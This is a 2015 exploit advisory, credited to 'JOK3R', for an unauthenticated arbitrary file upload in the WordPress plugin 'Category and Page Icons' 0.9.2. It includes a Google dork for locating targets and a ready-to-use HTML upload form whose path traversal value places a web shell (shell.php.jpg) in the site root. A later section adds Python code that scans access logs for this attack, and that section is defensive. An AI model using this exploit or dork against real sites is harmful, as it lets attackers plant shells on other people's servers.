WordPress Category and Page Icons File Upload

Published: 2015.11.21
Credit: JOK3R
Risk: High
CWE: N/A
CVE: N/A
Local: No
Remote: Yes
Dork: index of "/wp-content/plugins/category-page-icons/"

* Discovery Date: 12/05/2015
* Public Disclosure Date: 20/11/2015
* Exploit Author: JOK3R
* Contact: skype : l0calroot ----> Yahoo : suorce@yahoo.com
* Software Link: https://wordpress.org/plugins/category-page-icons/
* Version: 0.9.2
* Tested on: WordPress 4.3.1

* dork : index of "/wp-content/plugins/category-page-icons/"

#####################################################
demo :

site.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php

Exploit :

<form enctype="multipart/form-data"
action="http://site/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php" method="post">
Your File: <input name="wpdev-async-upload" type="file" /><br />
<input type="hidden" name="dir_icons" value="../../../../">
<input type="submit" value="upload" />
</form>

Resulting path of the uploaded file (the dir_icons value ../../../../ places it in the site root): site.com/shell.php.jpg
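
Detection logic for the request pattern above, as an added example that is not part of the original advisory: it scans web server access-log lines for successful POSTs to the uploader endpoint and for successful requests to files with a script extension buried inside the name, such as shell.php.jpg. The Combined Log Format, the scan() function and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Upload endpoint named in the advisory (matched as a suffix so that
# WordPress installs living in a subdirectory are covered too).
UPLOADER = "/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php"

# Assumed input: Apache/nginx Combined Log Format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Script extension followed by a second extension, e.g. shell.php.jpg
DOUBLE_EXT_RE = re.compile(r'\.(?:php\d?|phtml|phar)\.[A-Za-z0-9]+$', re.I)


def scan(lines):
    """Return (kind, ip, time, path) tuples for suspicious 2xx requests."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or not m["status"].startswith("2"):
            continue  # unparsable line, or the request did not succeed
        path = unquote(m["path"].split("?", 1)[0])
        if m["method"] == "POST" and path.lower().endswith(UPLOADER):
            findings.append(("uploader-post", m["ip"], m["time"], path))
        elif DOUBLE_EXT_RE.search(path):
            findings.append(("double-extension-hit", m["ip"], m["time"], path))
    return findings


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Nov/2015:10:01:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Nov/2015:10:01:09 +0000] "POST /wp-content/plugins/'
    'category-page-icons/include/wpdev-flash-uploader.php HTTP/1.1" 200 17 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Nov/2015:10:01:15 +0000] "GET /shell.php.jpg HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [21/Nov/2015:10:02:00 +0000] "POST /wp-content/plugins/'
    'category-page-icons/include/wpdev-flash-uploader.php HTTP/1.1" 404 0 "-" "curl/7.40"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="  ")
```

A finding of either kind on a site running the affected plugin version is a reason to inspect the web root for files that were not part of the deployment.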

###########
# thanks : w4l3XzY3 , holako , MuhmadEmad , AlfabetoVirtual , MOHAMAD-NOFOZI , China Fans , Mr Magnom , Skip3r
# And All my Friends
###########



Copyright 2017, cxsecurity.com